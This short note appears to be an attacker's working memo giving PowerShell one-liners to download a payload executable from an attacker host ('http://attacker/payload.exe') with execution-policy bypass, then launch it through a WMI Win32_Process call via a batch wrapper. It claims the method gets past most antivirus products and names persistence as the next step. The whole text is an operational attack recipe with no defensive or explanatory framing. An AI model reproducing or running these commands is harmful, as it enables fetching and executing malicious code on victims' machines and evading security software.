Download bin:
powershell -exec bypass -c Invoke-WebRequest -Uri http://attacker/payload.exe -OutFile c:\Users\Public\Documents\payload.exe #wrap the execution of payload.exe in a batch file called start.cmd and "download" it to target as well.
Execute bin:
powershell -exec bypass -c Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList c:\Users\Public\Documents\start.cmd
The powershell got around most AVs and combo of the batch file and ps cmd the payload should run on its own, no matter how you managed code execution on the target. Persistence is the next todo.
